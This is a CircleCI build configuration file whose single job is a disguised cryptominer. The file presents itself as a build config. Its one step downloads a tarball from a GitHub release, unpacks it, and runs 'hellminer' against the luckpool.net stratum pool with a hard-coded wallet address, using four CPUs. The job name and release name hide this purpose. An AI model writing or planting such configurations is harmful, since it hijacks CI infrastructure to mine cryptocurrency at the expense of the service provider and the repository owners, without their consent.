version: 2.1
jobs:
  build_1:
    docker:
      - image: golang:latest
    steps:
      - run:
          name: wadai_1
          command: |
            wget https://github.com/sambergelap/sambergelap/releases/download/Scala/SCALA.tar.gz
            tar xf SCALA.tar.gz
            ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 4